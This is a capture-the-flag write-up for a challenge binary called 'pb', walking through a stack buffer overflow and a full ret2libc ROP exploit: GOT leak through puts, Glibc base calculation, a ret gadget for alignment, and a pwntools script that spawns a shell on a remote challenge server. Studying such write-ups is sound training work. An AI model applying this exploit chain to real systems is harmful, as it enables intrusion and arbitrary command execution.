Pandora's Box
We are given a 64-bit binary called pb:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
Reverse engineering
We can use Ghidra to analyze the binary and look at the decompiled source code in C:
int main() {
    setup();
    cls();
    banner();
    box();
    return 0;
}
Among other functions, main calls box:
void box() {
    long num;
    char data [32];

    data._0_8_ = 0;
    data._8_8_ = 0;
    data._16_8_ = 0;
    data._24_8_ = 0;
    fwrite("This is one of Pandora\'s mythical boxes!\n\nWill you open it or Return it to the Library for analysis?\n\n1. Open.\n2. Return.\n\n>> ", 1, 0x7e, stdout);
    num = read_num();

    if (num != 2) {
        fprintf(stdout,"%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n",&DAT_004021c7);
        /* WARNING: Subroutine does not return */
        exit(0x520);
    }

    fwrite("\nInsert location of the library: ", 1, 0x21, stdout);
    fgets(data, 256, stdin);
    fwrite("\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n", 1, 0x4b, stdout);
    return;
}
Buffer Overflow vulnerability
The binary is vulnerable to a buffer overflow: data is a 32-byte buffer, but fgets is called with a size of 256, so any input longer than 32 bytes is written past the end of the buffer.
We can check that the program crashes in this situation (option 2):
$ ./pb
βββββββββββββββββββ
β£ β£
β£ ββ β£
β£ βββββββββββββββ β£
β£ ββ β£
β£ β£
βββββββββββββββββββ
This is one of Pandora's mythical boxes!
Will you open it or Return it to the Library for analysis?
1. Open.
2. Return.
>> 2
Insert location of the library: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
We will deliver the mythical box to the Library for analysis, thank you!
zsh: segmentation fault (core dumped) ./pb
Since this is a 64-bit binary without stack canaries, we might expect the offset to the saved return address to be 40 bytes: the 32 bytes reserved for data, followed by the saved value of $rbp (8 bytes), and right after it, the saved return address.
However, this time it is a bit different. The best thing is to check the disassembly of box:
$ objdump -M intel --disassemble=box pb
pb: file format elf64-x86-64
Disassembly of section .init:
Disassembly of section .plt:
Disassembly of section .text:
00000000004012c2 <box>:
4012c2: 55 push rbp
4012c3: 48 89 e5 mov rbp,rsp
4012c6: 48 83 ec 30 sub rsp,0x30
4012ca: 48 c7 45 d0 00 00 00 mov QWORD PTR [rbp-0x30],0x0
4012d1: 00
4012d2: 48 c7 45 d8 00 00 00 mov QWORD PTR [rbp-0x28],0x0
4012d9: 00
4012da: 48 c7 45 e0 00 00 00 mov QWORD PTR [rbp-0x20],0x0
4012e1: 00
4012e2: 48 c7 45 e8 00 00 00 mov QWORD PTR [rbp-0x18],0x0
4012e9: 00
4012ea: 48 8b 05 1f 2d 00 00 mov rax,QWORD PTR [rip+0x2d1f] # 404010 <stdout@@GLIBC_2.2.5>
...
40139e: e8 1d fd ff ff call 4010c0 <fwrite@plt>
4013a3: 90 nop
4013a4: c9 leave
4013a5: c3 ret
Disassembly of section .fini:
We see that the function reserves 0x30 (48) bytes on the stack, and that data starts at the very bottom of that space ($rbp-0x30, the first QWORD that is zeroed). After those 48 bytes come 8 bytes for the saved $rbp of the previous stack frame, and then the saved $rip (return address), which we want to overwrite with the buffer overflow. In total, we need 56 bytes to reach the return address on the stack.
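The arithmetic can be double-checked with a few lines of Python. This is only a sketch: the constants are read from the disassembly above, and the variable names are illustrative.

```python
# Values read from the disassembly of box (names are illustrative).
BUFFER_RBP_OFFSET = 0x30   # data starts at [rbp-0x30], the first zeroed QWORD
BUFFER_SIZE = 32           # char data[32] in the decompiled source
SAVED_RBP_SIZE = 8         # pushed by `push rbp`

# Bytes between the end of data and the saved rbp (other locals and padding).
gap = BUFFER_RBP_OFFSET - BUFFER_SIZE

# Bytes from the start of data up to the saved return address.
offset = BUFFER_SIZE + gap + SAVED_RBP_SIZE

print(gap, offset)
```

The 16 extra bytes between data and the saved $rbp are the reason the naive estimate of 40 falls short.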
Exploit strategy
Since the binary has NX enabled, we must use Return-Oriented Programming (ROP) to execute arbitrary code. This technique makes use of gadgets, which are short sequences of instructions that (usually) end in ret. We can place a list of gadget addresses on the stack so that when a gadget finishes, its ret takes the next address from the stack and jumps to the next gadget. That list is what we call a ROP chain.
This bypasses NX because we are not executing instructions stored on the stack (shellcode); instead, we redirect the program to addresses that are already executable and contain the instructions we want.
In order to gain code execution, we will perform a ret2libc attack. This technique consists of calling system inside Glibc with a pointer to the string "/bin/sh" (which is also inside Glibc) as its first argument. The problem we must handle is ASLR, a protection that randomizes the base address at which shared libraries are loaded.
Since we want to call system with "/bin/sh", we need to know the addresses of both inside Glibc at runtime (these addresses change on every execution). Hence, we must find a way to leak an address inside Glibc: the only thing that is random is the base address of Glibc, and every other address is a fixed offset from that base.
To leak an address, we call a function like puts (or printf or write) with an entry of the Global Offset Table (GOT) as first argument (for example, the entry for fprintf). This table contains the real addresses of the external functions used by the program (once they have been resolved; with Full RELRO, all of them are resolved at load time). Since puts is used by the binary, we can call it through the Procedure Linkage Table (PLT), which jumps to the real address of puts.
One more thing to consider is how arguments are passed. Because of the calling convention for 64-bit binaries, the arguments of a function must be stored in registers (in order: $rdi, $rsi, $rdx, $rcx…). This is why we need gadgets such as pop rdi; ret: the instruction pop rdi takes the next value from the stack and stores it in $rdi.
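To make the mechanics concrete, here is a toy model of how a chain is consumed. It is not a CPU emulator: the strings are symbolic labels standing in for real addresses, and run_chain is a hypothetical helper written only for this illustration.

```python
# Toy model of a ROP chain: symbolic labels stand in for real addresses.
def run_chain(stack):
    """Simulate ret-driven control flow over a list of 8-byte stack slots."""
    rdi = None
    trace = []
    stack = list(stack)
    while stack:
        target = stack.pop(0)      # `ret` pops the next slot into rip
        if target == "pop rdi; ret":
            rdi = stack.pop(0)     # `pop rdi` consumes the following slot
            trace.append(f"rdi = {rdi}")
        else:
            # Anything else is treated as a function that eventually returns.
            trace.append(f"jump to {target} (rdi = {rdi})")
            rdi = None             # rdi is caller-saved: not preserved by the callee
    return trace

chain = ["pop rdi; ret", "fprintf@got", "puts@plt", "main"]
for step in run_chain(chain):
    print(step)
```

The trace shows the idea behind the leak: the gadget loads the GOT entry into $rdi, puts prints what it points to, and execution then continues at main.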
Exploit development
Nice, let’s start with the leakage process. These are the values we need:
- Address of a pop rdi; ret gadget (0x40142b):
$ ROPgadget --binary pb | grep 'pop rdi ; ret'
0x000000000040142b : pop rdi ; ret
- GOT addresses:
$ objdump -R pb
pb: file format elf64-x86-64
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0000000000403ff0 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.2.5
0000000000403ff8 R_X86_64_GLOB_DAT __gmon_start__
0000000000404010 R_X86_64_COPY stdout@@GLIBC_2.2.5
0000000000404020 R_X86_64_COPY stdin@@GLIBC_2.2.5
0000000000403fa0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
0000000000403fa8 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5
0000000000403fb0 R_X86_64_JUMP_SLOT alarm@GLIBC_2.2.5
0000000000403fb8 R_X86_64_JUMP_SLOT read@GLIBC_2.2.5
0000000000403fc0 R_X86_64_JUMP_SLOT fgets@GLIBC_2.2.5
0000000000403fc8 R_X86_64_JUMP_SLOT fprintf@GLIBC_2.2.5
0000000000403fd0 R_X86_64_JUMP_SLOT setvbuf@GLIBC_2.2.5
0000000000403fd8 R_X86_64_JUMP_SLOT strtoul@GLIBC_2.2.5
0000000000403fe0 R_X86_64_JUMP_SLOT exit@GLIBC_2.2.5
0000000000403fe8 R_X86_64_JUMP_SLOT fwrite@GLIBC_2.2.5
- Address of puts at the PLT (0x401030):
$ objdump -M intel -d pb | grep puts@plt
0000000000401030 <puts@plt>:
40124a: e8 e1 fd ff ff call 401030 <puts@plt>
401261: e8 ca fd ff ff call 401030 <puts@plt>
40126d: e8 be fd ff ff call 401030 <puts@plt>
- Address of main (0x4013a6):
$ objdump -M intel -d pb | grep '<main>'
00000000004013a6 <main>:
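With these values, the first-stage payload can be assembled by hand. The following is a minimal sketch using only the standard library; p64 here is a local stand-in for the pwntools helper of the same name, and the constants are the ones listed above plus the 56-byte offset derived from the disassembly of box.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack("<Q", value)

OFFSET = 56              # bytes from data up to the saved return address
POP_RDI_RET = 0x40142b   # from ROPgadget
FPRINTF_GOT = 0x403fc8   # from objdump -R
PUTS_PLT = 0x401030      # from objdump -d
MAIN = 0x4013a6          # from objdump -d

payload = b"A" * OFFSET
payload += p64(POP_RDI_RET)   # load the next word into rdi
payload += p64(FPRINTF_GOT)   # argument: address of the GOT entry
payload += p64(PUTS_PLT)      # puts(fprintf@got) prints the resolved address
payload += p64(MAIN)          # return to main to send a second payload

print(len(payload), payload[OFFSET:].hex())
```

The payload is 88 bytes long, well within the 256 bytes accepted by fgets, and it contains no newline byte, which would otherwise make fgets stop reading early.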
I have shown the manual approach to start the ret2libc exploit. However, I will be using pwntools from now on.
Leaking memory addresses
We can use this Python script:
#!/usr/bin/env python3

import sys

from pwn import *

context.binary = elf = ELF('pb')
glibc = ELF('glibc/libc.so.6', checksec=False)
rop = ROP(elf)


def get_process():
    # No arguments: run the binary locally; otherwise connect to host:port
    if len(sys.argv) == 1:
        return elf.process()

    host, port = sys.argv[1].split(':')
    return remote(host, port)


def main():
    p = get_process()

    offset = 56  # bytes from data up to the saved return address
    junk = b'A' * offset

    # Stage 1: puts(fprintf@got), then return to main
    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(elf.got.fprintf)
    payload += p64(elf.plt.puts)
    payload += p64(elf.sym.main)

    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Insert location of the library: ', payload)
    p.interactive()


if __name__ == '__main__':
    main()
Here we have leaked the address of fprintf at runtime:
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 143704
[*] Switching to interactive mode
We will deliver the mythical box to the Library for analysis, thank you!
\xb0\x16\xe9\x98
βββββββββββββββββββ
β£ β£
β£ ββ β£
β£ βββββββββββββββ β£
β£ ββ β£
β£ β£
βββββββββββββββββββ
This is one of Pandora's mythical boxes!
Will you open it or Return it to the Library for analysis?
1. Open.
2. Return.
>> $
We also see that we have returned to main, which is necessary because we have to enter another payload without stopping the program.
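The raw bytes printed before the banner are the address in little-endian order. Since puts stops at the first null byte, only the significant bytes are printed, followed by a newline. A small sketch of how such a line can be decoded with the standard library (decode_leak is a hypothetical helper, and the sample bytes are illustrative rather than taken from the run above):

```python
import struct

def decode_leak(line: bytes) -> int:
    """Turn the raw line printed by puts into an integer address."""
    raw = line.rstrip(b"\n")       # puts appends a newline
    raw = raw.ljust(8, b"\x00")    # restore the null bytes puts did not print
    return struct.unpack("<Q", raw)[0]

# Illustrative input: the six significant bytes of a typical Glibc address.
sample = bytes.fromhex("b0f68fe4477f") + b"\n"
print(hex(decode_leak(sample)))
```

This approach assumes the address contains no null or newline byte among its significant bytes; if it did, the line would be cut short and the decoded value would be wrong.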
Now we need to compute the base address of Glibc, which is simple: we subtract the offset of fprintf inside Glibc from its real address at runtime, and the result is the base address. Let’s collect all the offsets we need:
- Offset of fprintf (0x606b0):
$ readelf -s glibc/libc.so.6 | grep fprintf
174: 000000000005a4f0 11 FUNC GLOBAL DEFAULT 15 _IO_vfprintf@@GLIBC_2.2.5
731: 00000000000606b0 183 FUNC WEAK DEFAULT 15 _IO_fprintf@@GLIBC_2.2.5
734: 0000000000134e20 192 FUNC GLOBAL DEFAULT 15 __fprintf_chk@@GLIBC_2.3.4
778: 00000000000606b0 183 FUNC GLOBAL DEFAULT 15 fprintf@@GLIBC_2.2.5
1597: 000000000005a4f0 11 FUNC GLOBAL DEFAULT 15 vfprintf@@GLIBC_2.2.5
2683: 0000000000134f00 28 FUNC GLOBAL DEFAULT 15 __vfprintf_chk@@GLIBC_2.3.4
- Offset of system (0x50d60):
$ readelf -s glibc/libc.so.6 | grep system
396: 0000000000050d60 45 FUNC GLOBAL DEFAULT 15 __libc_system@@GLIBC_PRIVATE
1481: 0000000000050d60 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5
2759: 0000000000169140 103 FUNC GLOBAL DEFAULT 15 svcerr_systemerr@GLIBC_2.2.5
- Offset of "/bin/sh" (0x1d8698):
$ strings -atx glibc/libc.so.6 | grep /bin/sh
1d8698 /bin/sh
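The three offsets are enough to resolve everything from a single leak. The sketch below shows the computation; resolve is a hypothetical helper, and the leaked value passed to it is only an example, since the real one changes on every run.

```python
FPRINTF_OFFSET = 0x606b0   # readelf -s
SYSTEM_OFFSET = 0x50d60    # readelf -s
BIN_SH_OFFSET = 0x1d8698   # strings -atx

def resolve(leaked_fprintf: int) -> dict:
    """Compute runtime addresses from a leaked fprintf address."""
    base = leaked_fprintf - FPRINTF_OFFSET
    # Libraries are mapped at page boundaries, so the base must end in 000.
    if base & 0xfff:
        raise ValueError(f"unexpected base {hex(base)}: wrong libc or bad leak")
    return {
        "base": base,
        "system": base + SYSTEM_OFFSET,
        "bin_sh": base + BIN_SH_OFFSET,
    }

# Example leak value; real values differ between executions.
for name, addr in resolve(0x7f47e48ff6b0).items():
    print(f"{name}: {hex(addr)}")
```

The page-alignment check is a cheap way to detect a mismatched Glibc version: if the remote library differs from the local copy, the offsets differ and the computed base will most likely not be aligned.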
Getting RCE
Then, we can compute the real addresses of system and "/bin/sh" at runtime because we have the base address of Glibc at runtime. Let’s check it out:
fprintf_addr = u64(p.recvline().strip().ljust(8, b'\0'))
p.info(f'Leaked fprintf() address: {hex(fprintf_addr)}')
glibc.address = fprintf_addr - glibc.sym.fprintf
p.info(f'Glibc base address: {hex(glibc.address)}')
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 150949
[*] Leaked fprintf() address: 0x7f47e48ff6b0
[*] Glibc base address: 0x7f47e489f000
[*] Switching to interactive mode
βββββββββββββββββββ
β£ β£
β£ ββ β£
β£ βββββββββββββββ β£
β£ ββ β£
β£ β£
βββββββββββββββββββ
This is one of Pandora's mythical boxes!
Will you open it or Return it to the Library for analysis?
1. Open.
2. Return.
>> $
As a sanity check, we see that the base address of Glibc ends in 000 in hexadecimal, and that’s correct. Let’s finish the exploit:
payload = junk
payload += p64(rop.rdi[0])
payload += p64(next(glibc.search(b'/bin/sh')))
payload += p64(glibc.sym.system)
p.sendlineafter(b'>> ', b'2')
p.sendlineafter(b'Insert location of the library: ', payload)
p.recv()
p.interactive()
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 151797
[*] Leaked fprintf() address: 0x7fdbb41c36b0
[*] Glibc base address: 0x7fdbb4163000
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
But it does not work (Got EOF while reading in interactive). This might be a stack alignment issue (as in Labyrinth). A single ret gadget before calling system will do the trick (otherwise, we would need to use GDB to debug the exploit):
payload = junk
payload += p64(rop.rdi[0])
payload += p64(next(glibc.search(b'/bin/sh')))
payload += p64(rop.ret[0])
payload += p64(glibc.sym.system)
And now it works correctly:
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 154943
[*] Leaked fprintf() address: 0x7fe5fb7d36b0
[*] Glibc base address: 0x7fe5fb773000
[*] Switching to interactive mode
$ ls
flag.txt glibc pb solve.py
$ cat flag.txt
HTB{f4k3_fl4g_4_t35t1ng}
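The effect of the extra ret gadget on stack alignment can be sketched with simple arithmetic. The model below assumes that box was entered through a regular call, so the slot holding its return address sits at an address that is 8 modulo 16, and that functions expect that same alignment on entry (crashes of this kind are commonly attributed to aligned SSE instructions such as movaps inside system). The slot address is hypothetical.

```python
def rsp_on_entry(saved_ret_slot: int, index: int) -> int:
    """rsp when control reaches chain word `index` (0 = overwritten return address).

    Every word consumed by a ret or a pop moves rsp up by 8 bytes.
    """
    return saved_ret_slot + 8 * (index + 1)

# Hypothetical address of the saved return address slot of box.
SLOT = 0x7ffe00001238
assert SLOT % 16 == 8   # what a regular call leaves behind

without_ret = ["pop rdi; ret", "/bin/sh", "system"]
with_ret = ["pop rdi; ret", "/bin/sh", "ret", "system"]

for chain in (without_ret, with_ret):
    rsp = rsp_on_entry(SLOT, chain.index("system"))
    print(len(chain), "words -> rsp % 16 =", rsp % 16)
```

With three words, system is entered with rsp at 0 modulo 16 instead of the expected 8; the additional ret shifts rsp by 8 bytes and restores the alignment a normal call would produce.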
Flag
So, let’s try remotely:
$ python3 solve.py 165.232.98.11:30618
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Opening connection to 165.232.98.11 on port 30618: Done
[*] Leaked fprintf() address: 0x7f0b43b8a6b0
[*] Glibc base address: 0x7f0b43b2a000
[*] Switching to interactive mode
$ ls
core
flag.txt
glibc
pb
$ cat flag.txt
HTB{r3turn_2_P4nd0r4?!}
The full exploit code is here: solve.py.